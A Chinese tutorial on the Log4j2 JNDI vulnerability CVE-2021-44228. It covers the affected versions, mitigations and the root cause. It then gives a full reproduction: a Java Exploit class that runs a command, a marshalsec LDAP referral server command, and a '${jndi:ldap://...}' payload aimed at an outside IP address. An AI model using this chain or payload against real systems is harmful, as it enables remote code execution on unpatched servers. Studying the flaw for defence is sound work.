LOG4J2史诗级漏洞

log4j2史诗级漏洞

背景

12月9日晚,Apache Log4j2被曝出一个高危漏洞CVE-2021-44228,攻击者只需要输入一段代码,就可以控制受害者服务器,利用门槛极低。
目前Log4j 团队已注意到一个安全漏洞 CVE-2021-44228,该漏洞已在 Log4j 2.15.0 中得到解决。

漏洞基本信息

受影响的版本为Log4j2.X < 2.15.0

修复方式

  • 方法一:升级Log4j2的版本至2.15.0
  • 方法二:在版本> = 2.10,设置系统属性log4j2.formatMsgNoLookups=true或环境变量LOG4J_FORMAT_MSG_NO_LOOKUPS=true。对于 >=2.7 和 <=2.14.1 的版本,PatternLayout可以修改所有模式以将消息转换器指定为 ,%m{nolookups}而不仅仅是%m。对于> = 2.0-beta9和<= 2.10.0,方法是去除JndiLookup类:zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  • 方法三:禁止服务器访问外网

漏洞原理

java在部分低版本时允许通过rmi、LDAP-JNDI注入一些不属于本JVM中的类,并运行。log4j2的PatternLayout中的format调用了lookup,并且没有检查是否是本地协议,从而导致出现了问题。

复现漏洞

  1. 建立一个使用log4j2的项目,版本可以设置为小于2.15.0的版本,可以使用2.9.0 。

  2. 新建一个恶意文件Exploit ,这里主要是启动macos中的计算器,用于演示可以控制jvm所在主机。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    import java.io.IOException;
    import java.io.Serializable;
    import java.util.Hashtable;
    import javax.naming.Context;
    import javax.naming.Name;
    import javax.naming.spi.ObjectFactory;

    public class Exploit implements ObjectFactory, Serializable {
    public Exploit(){
    try{
    Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
    }catch (IOException e){
    e.printStackTrace();
    }

    }

    public static void main(String[] args){
    Exploit exploit = new Exploit();
    }
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
    return null;
    }
    }

  3. 使用jdk8(尽量使用低版本)编译这个java文件,然后找个(非目标)服务器放上去。尽量使用低版本是为了防止目标服务器jre版本过低导致高版本编译的class无法在低版本jvm上运行。

  4. 构建一个jndi服务器,用于传输这个class文件,推荐使用marshalsec。

    1
    java -cp /data/javaapp/ldap/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ldap.shellingford.cn/#Exploit 6666
  5. 启动demo程序,写入日志即可。

    1
    2
    3
    4
    public static void main(String[] args) {
    logger.error(System.getProperty("java.version"));
    logger.error("${jndi:ldap://23.95.230.154:6666/a}");
    }

效果图:

如果没有效果就需要检查运行的jvm版本了,对照上面的图,在部分jdk版本以上,修复了ldap-jndi注入。